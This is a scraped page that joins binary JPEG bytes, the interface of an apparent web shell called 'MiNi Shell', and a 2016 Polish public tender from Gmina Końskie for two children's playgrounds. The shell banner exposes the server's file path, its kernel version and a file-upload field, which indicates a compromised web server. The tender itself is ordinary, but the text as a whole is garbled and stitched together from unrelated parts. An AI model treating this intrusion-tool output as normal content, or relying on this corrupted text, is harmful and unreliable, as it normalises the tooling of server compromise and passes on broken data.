JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160623/101471-N-2016.html

<p class="kh_header"><b>Końskie: Zadanie nr 1:	 Budowa miejsca rekreacji dla dzieci na osiedlu 3-go Maja w Końskich
i/lub
Zadanie nr 2:	Budowa placu zabaw na osiedlu przy ul. Robotniczej w Końskich</b><br>
<b>Numer ogłoszenia: 101471 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Końskie , ul. Partyzantów 1/24, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3723249, 3723720, faks 041 3722955.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umkonskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1:	 Budowa miejsca rekreacji dla dzieci na osiedlu 3-go Maja w Końskich
i/lub
Zadanie nr 2:	Budowa placu zabaw na osiedlu przy ul. Robotniczej w Końskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:	Budowa miejsca rekreacji dla dzieci na osiedlu 3-go Maja w Końskich.
Dostawa i montaż: 
1.	huśtawka wahadłowa poczwórna o wymiarach zewnętrznych 2,33 m x 6,95 m, wysokości 2,28 m, strefie bezpieczeństwa 7,50 m x 6,90 m i maksymalnej wysokości upadku 1,32 m - szt. 1,
2.	huśtawka wahadłowa bocianie gniazdo o wymiarach zewnętrznych 3,00 m x 2,90 m, wysokości 2,40 m, strefie bezpieczeństwa 2,30 m x 7,50 m i maksymalnej wysokości upadku 1,50 m - szt. 1, 
3.	bujak sprężynowy o wymiarach zewnętrznych 1,0 m x 0,55 m, wysokości 0,9 m, strefie bezpieczeństwa 3,4 m x 3,0 m i maksymalnej wysokości upadku 0,90 m - szt. 1,
4.	bujak sprężynowy motorek o wymiarach zewnętrznych 1,0 m x 0,55 m, wysokości 0,9 m, strefie bezpieczeństwa 3,4 m x 3,0 m i maksymalnej wysokości upadku 0,90 m - szt. 1,
5.	bujak sprężynowy konik o wymiarach zewnętrznych 1,0 m x 0,55 m, wysokości 0,9 m, strefie bezpieczeństwa 3,4 m x 3,0 m i maksymalnej wysokości upadku 0,90 m - szt. 1,
6.	bujak sprężynowy piesek o wymiarach zewnętrznych 1,14 m x 0,312 m, wysokości 0,595 m, strefie bezpieczeństwa 4,14 m x 3,30 m i maksymalnej wysokości upadku 0,60 m - szt. 1,
7.	huśtawka sprężynowa o wymiarach zewnętrznych 3,0 m x 0,95 m, wysokości 0,85 m, strefie bezpieczeństwa 5,20 m x 3,35 m i maksymalnej wysokości upadku 0,85 m - szt. 1,
8.	karuzela o O 1,50 m, wysokości 0,9 m, strefie bezpieczeństwa O 5,5 i maksymalnej wysokości upadku 0,90 m - szt. 1,
9.	zestaw zabawowy o wymiarach zewnętrznych 8,23 m x 5,17 m, wysokości 4,21 m, strefie bezpieczeństwa 11,75 m x 7,74 m i maksymalnej wysokości upadku 1,36 m - szt. 1,
10.	zjeżdżalnia o wymiarach zewnętrznych 3,20 m x 3,30 m, wysokości 3,80 m, strefie bezpieczeństwa 6,20 m x 6,80 m i maksymalnej wysokości upadku 1, 0 m - szt. 1,
11.	piaskownica o wymiarach zewnętrznych 3,0 m x 3,00 m, strefie bezpieczeństwa 6,0 m x 6,0 m i maksymalnej wysokości upadku 0,30 m - szt. 1,
12.	linarium stożek duży o wymiarach zewnętrznych 3,50 m x 4,00 m, strefie bezpieczeństwa O 7,0 m i maksymalnej wysokości upadku 1,20 m - szt. 1,
13.	ścianka kamień, papier nożyce o wymiarach zewnętrznych 1,00 m x 0,40 m i wysokości 0,80 m - szt. 1,
14.	ścianka liczydło o wymiarach zewnętrznych 1,00 m x 0,40 m i wysokości 0,80 m - szt. 1,
15.	ścianka samochodzik o wymiarach zewnętrznych 1,00 m x 0,40 m i wysokości 0,80 m - szt. 1,
16.	tablice malowanko o wymiarach zewnętrznych 2,00 m x 2,00 m, wysokości 1,60 m i strefie bezpieczeństwa 4,0 m x 4,0 m - szt. 1,
17.	tablica informacyjna o wymiarach zewnętrznych 0,37 m x 0,06 m i wysokości 1,75 m - szt. 1,
18.	ławka z oparciem o wymiarach zewnętrznych 2,00 m x 0,77 m i wysokości 0,94 m - szt. 4,
19.	 kosz na śmieci o O 0,35 m i wysokości 1,10 m - szt. 2,
20.	ogrodzenie panelowe o wymiarach 1,0 m x 2,50 m, wykonane z poziomych i pionowych prętów stalowych o grubości 4,00 mm, osadzonych na słupkach stalowych o przekroju 40 x 60 mm lub 60 x 600 mm i długości 1,80 m wraz z furtką i bramą,
21.	nawierzchnia bezpieczna z piasku.
Szczegółowy zakres przedmiotu określa dokumentacja projektowa w zakresie przedmiotu zamówienia STWiOR oraz  przedmiar robót stanowiący materiał informacyjno-pomocniczy. 
i/lub 
Zadanie nr 2:	Budowa placu zabaw na osiedlu przy ul. Robotniczej w Końskich.
Dostawa i montaż:
1.	zestaw zabawowy o wymiarach zewnętrznych 9,40 m x 7,50 m, wysokości 3,80 m, strefie bezpieczeństwa 12,40 m x 10,50 m i maksymalnej wysokości upadku 1,60 m - szt. 1,
2.	małpi gaj o wymiarach zewnętrznych 2,70 m x 2,50 m, wysokości 2,80 m, strefie bezpieczeństwa O 7,50 m i maksymalnej wysokości upadku 2,80 m - szt. 1, 
3.	Linarium twierdza o wymiarach zewnętrznych 2,20 m x 2,20 m, wysokości 2,00 m, strefie bezpieczeństwa 5,90 m x 5,90 m i maksymalnej wysokości upadku 2,00 m - szt. 1,
4.	huśtawka wahadłowa podwójna o wymiarach zewnętrznych 3,61 m x 1,345 m, wysokości 2,48 m, strefie bezpieczeństwa 8,00 m x 4,00 m i maksymalnej wysokości upadku 1,50 m - szt. 1,
5.	bujak sprężynowy motorek o wymiarach zewnętrznych 0,86 m x 0,275 m, wysokości 0,965 m, strefie bezpieczeństwa 3,86 m x 3,28 m i maksymalnej wysokości upadku 0,60 m - szt. 1,
6.	bujak sprężynowy piesek o wymiarach zewnętrznych 1,14 m x 0,312 m, wysokości 0,595 m, strefie bezpieczeństwa 4,14 m x 3,30 m i maksymalnej wysokości upadku 0,60 m - szt. 1,
7.	bujak sprężynowy kwiatek o wymiarach zewnętrznych 1,00 m x 1,00 m, wysokości 0,60 m, strefie bezpieczeństwa O 3,50 m i maksymalnej wysokości upadku 0,60 m - szt. 1,
8.	huśtawka sprężynowa o wymiarach zewnętrznych 1,50 m x 0,30 m, wysokości 1,00 m, strefie bezpieczeństwa 3,30 m x 4,50 m i maksymalnej wysokości upadku 1,60 m - szt. 1,
9.	karuzela tarczowa  o wymiarach zewnętrznych O 1,50 m, wysokości 0,90 m, strefie bezpieczeństwa O 5,50 m i maksymalnej wysokości upadku 0,90 m - szt. 1,
10.	tablica informacyjna o wymiarach zewnętrznych 0,37 m x 0,06 m i wysokości 1,75 m - szt. 1,
11.	ławka z oparciem o wymiarach zewnętrznych 2,00 m x 0,77 m i wysokości 0,94 m - szt. 4,
12.	 kosz na śmieci o O 0,35 m i wysokości 1,10 m - szt. 2,
13.	motyl ściskający + motyl rozciągający o wymiarach zewnętrznych 1,85 m x 1,10 m, wysokości 1,95 m, strefie bezpieczeństwa 5,05 m x 4,14 m i maksymalnej wysokości upadku 0,70 m - szt. 1,
14.	biegacz + orbitek o wymiarach zewnętrznych 2,35 m x 1,25 m, wysokości 2,09 m, strefie bezpieczeństwa 5,35 m x 4,25 m i maksymalnej wysokości upadku 0,30 m - szt. 1,
15.	kolarz + prostownik nóg o wymiarach zewnętrznych 1,95 m x 0,65 m, wysokości 1,95 m, strefie bezpieczeństwa 5,30 m x 3,65 m i maksymalnej wysokości upadku 0,90 m - szt. 1,
16.	expander z pylonem 2 stanowiska o wymiarach zewnętrznych 1,97 m x 0,97 m, wysokości 2,09 m, strefie bezpieczeństwa 4,97 m x 3,97 m i maksymalnej wysokości upadku 0,37 m - szt. 1,
17.	stojak na rowery - szt. 1,
18.	huśtawka bocianie gniazdo + podwójna metalowa o wymiarach zewnętrznych 2,35 m x 6,00 m, wysokości 2,35 m, strefie bezpieczeństwa 7,50 m x 6,00 m i maksymalnej wysokości upadku 1,30 m - szt. 1,
19.	huśtawka wagowa metalowa podwójna o wymiarach zewnętrznych 3,85 m x 0,40 m, wysokości 0,90 m, strefie bezpieczeństwa 2,40 m x 5,70 m i maksymalnej wysokości upadku 0,90 m - szt. 1,
20.	równoważnia o wysokości 0,40 m, strefie bezpieczeństwa 2,40 m x 9,10 m i maksymalnej wysokości upadku 0,60 m - szt. 1,
21.	karuzela czteroramienna o O 1,5 m, wysokości 0,80 m, strefie bezpieczeństwa O 5,50 m i maksymalnej wysokości upadku 0,60 m - szt. 1,
22.	tablica do rysowania o wymiarach zewnętrznych 1,00 m x 0,20 m, wysokości 1,50 m, strefie bezpieczeństwa 4,00 m x 3,20 m i maksymalnej wysokości upadku 0,00 m - szt. 1
23.	pociąg o wymiarach zewnętrznych 2,80 m x 5,30 m, wysokości 2,20 m, strefie bezpieczeństwa 5,80 m x 8,30 m i wysokości swobodnego upadku 0,60 m - szt. 1,
24.	ogrodzenie panelowe o wymiarach 1,0 m x 2,50 m, wykonane z poziomych i pionowych prętów stalowych o grubości 4,00 mm, osadzonych na słupkach stalowych o przekroju 40 x 60 mm lub 60 x 600 mm i długości 1,80 m wraz z furtką i bramą,
Szczegółowy zakres przedmiotu określa dokumentacja projektowa w zakresie przedmiotu zamówienia STWiOR oraz  przedmiar robót stanowiący materiał informacyjno-pomocniczy. 

Uwagi:
1.	Jeżeli w SIWZ lub załącznikach w opisie przedmiotu zamówienia została wskazana nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń itp. Zamawiający wymaga aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń równoważnych o parametrach co najmniej równych lub wyższych niż wskazane. 
2.	Dopuszcza się rozwiązania równoważne opisywanym za pomocą norm, aprobat, specyfikacji technicznych lub systemów odniesienia o których mowa  w art. 30 ust.1-3 ustawy pzp.
3.	Każdy z Wykonawców winien odwiedzić miejsce budowy celem sprawdzenia warunków placu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
4.	Koszty odwiedzania miejsca budowy poniesie Wykonawca..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia  zad. 1 zadanie 1- Wykonawca winien wykazać się że wykonał w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną robotę budowlaną polegającą na :. na budowie obiektów małej architektury o wartości nie mniejszej niż: 130 000 zł brutto i/lub 
zadanie 2- Wykonawca winien wykazać się że wykonał w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną robotę budowlaną polegającą na :. polegającej na budowie obiektów małej architektury o wartości nie mniejszej niż: 120 000 zł brutto.
Uwaga w przypadku składania ofert częściowych na dwa zadania jednocześnie należy wykazać się największym udziałem wartościowym dla zadań.
Podstawą oceny spełnienia warunków, o których mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>zadanie 1- co najmniej jedną robotę budowlaną polegającą na :. polegającej na budowie obiektów małej architektury o wartości nie mniejszej niż: 130 000 zł brutto i/lub 
zadanie 2- co najmniej jedną robotę budowlaną polegającą na :. polegającej na budowie obiektów małej architektury o wartości nie mniejszej niż: 120 000 zł brutto.
Uwaga w przypadku składania ofert częściowych na dwa zadania jednocześnie należy wykazać się największym udziałem wartościowym dla zadań.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany FORMULARZ OFERTOWY, którego wzorzec przedstawiono w rozdziale D niniejszej specyfikacji istotnych warunków zamówienia
b)  Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym lub osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, 
iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu musi 
w szczególności przedstawić pisemne zobowiązanie takich podmiotów do oddania mu 
do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
c)  Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik, lub w przypadku wykonawców składających ofertę wspólną. Forma pełnomocnictwa: oryginał lub kopia poświadczona przez notariusza.
d) kosztorys ofertowy z uwagi na ryczałtowy charakter wynagrodzenie stanowi on materiał informacyjno-pomocniczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90.00</li>
<li>2 - Termin wykonania zamówienia - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej: 
1)	Zmiana terminu realizacji przedmiotu umowy gdy:
a)	wystąpią nieprzewidywalne, wyjątkowo niesprzyjające warunki atmosferyczne
b)	wystąpi siła wyższa 
c)	wystąpią odmienne od przyjętych w dokumentacji projektowej lecz niezależne od Wykonawcy warunki terenowe, w szczególności istnienia podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych niemożliwych do uwzględnienia na etapie projektowania,
d)	wystąpią wykopaliska 
e)	wystąpią zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: wstrzymanie realizacji umowy przez Zamawiającego;
f)	nastąpi opóźnienie wydania decyzji, zezwolenia, uzgodnienia itp. do wydania których instytucje są zobowiązane na mocy przepisów prawa lub regulaminów
g)	wystąpi konieczność wykonania prac dodatkowych lub zamiennych mających wpływ na termin realizowanego zamówienia
h)	wystąpi potrzeba udzielenia zamówienia dodatkowego,
i)	 wystąpi kolizja z planowanymi lub równolegle prowadzonymi inwestycjami.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 pkt. 1) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny 
do zakończenia wykonywania jej przedmiotu w sposób należyty.
2)	Pozostałe zmiany: 
1)	Przewiduje się możliwość ograniczenia zakresu rzeczowego przedmiotu umowy, w sytuacji gdy wykonanie danych robót będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy. W takim przypadku umowne wynagrodzenie Wykonawcy zostanie pomniejszone o wartość robót wyłączonych wyliczoną przy zastosowaniu cen jednostkowych i wskaźników kalkulacyjnych tożsamych z określonymi w kosztorysie ofertowym załączonym przez Wykonawcę do złożonej oferty, wyliczenia wartości robót wyłączonych dokonuje Wykonawca i wyliczenie to podlega zatwierdzeniu przez Zamawiającego,
2)	Przewiduje się możliwość wprowadzanie zamiany materiałów i urządzeń pod warunkiem, że zmiany te będą wynikać z aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów, z uwagi na niedostępność na rynku materiałów lub urządzeń spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń lub zmiany te będą konieczne ze względów technologicznych pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów lub urządzeń.
3)	Przewiduje się możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych w dokumentacji projektowej 
4)	Kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami lub kolizja z nieujawnionymi w dokumentacji przeszkodami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
